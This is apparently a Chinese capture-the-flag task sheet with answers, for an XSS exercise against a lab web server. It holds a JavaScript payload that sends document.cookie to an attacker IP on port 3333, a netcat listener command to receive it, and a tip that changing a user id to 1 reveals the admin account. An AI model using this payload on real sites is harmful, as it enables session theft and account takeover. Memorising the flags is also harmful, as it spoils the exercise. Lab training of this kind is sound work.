B-5：代码审计

B-5：代码审计

B-5：代码审计
任务环境说明：
● 服务器场景：PYsystem002
● 服务器场景操作系统：未知（显示链接）
● 服务器用户名:未知 密码：未知
1. 在渗透机Kali Linux中访问靶机服务器Web页面，注册账号并登陆，找到存在XSS执行漏洞的页面，将该页面中存在XSS执行漏洞的对象名作为FLAG提交；
2. 构造Cookie反弹JS脚本，将该JS代码中使用的对象及方法作为FLAG（形式：对象.方法）进行提交；
3. 在渗透机Kali Linux中重启Web服务，将重启使用的命令作为FLAG进行提交；
4. 在靶机服务器中利用原有的XSS漏洞调用上述JS脚本，在渗透机Kali Linux中开启3333端口监听，将开启端口监听使用的命令作为FLAG提交；
5. 在渗透机Kali Linux中开启3333端口监听，将开启端口监听后接收回应的第一行的第一个单词作为FLAG提交；
6. 在渗透机Kali Linux中开启3333端口监听，将开启端口监听后接收回应的第五行的最后一个单词作为FLAG提交。

1.在渗透机Kali Linux中访问靶机服务器Web页面，注册账号并登陆，找到存在XSS执行漏洞的页面，将该页面中存在XSS执行漏洞的对象名作为FLAG提交；

Flag:value

2.构造Cookie反弹JS脚本，将该JS代码中使用的对象及方法作为FLAG（形式：对象.方法）进行提交；

document.write('<img src="http://192.168.14.183:3333/xss'+document.cookie+'" />')

Flag:document.write

3.在渗透机Kali Linux中重启Web服务，将重启使用的命令作为FLAG进行提交；

Flag:service apache2 restart

4.在靶机服务器中利用原有的XSS漏洞调用上述JS脚本，在渗透机Kali Linux中开启3333端口监听，将开启端口监听使用的命令作为FLAG提交；

注册的用户是没有权限反弹的，将id改成1即可发现admin管理员用户

Flag:nc -l -p 3333

5.在渗透机Kali Linux中开启3333端口监听，将开启端口监听后接收回应的第一行的第一个单词作为FLAG提交；

Flag:GET

6.在渗透机Kali Linux中开启3333端口监听，将开启端口监听后接收回应的第五行的最后一个单词作为FLAG提交。

这里可能存在版本差异可能deflate不在第五行
Flag:deflate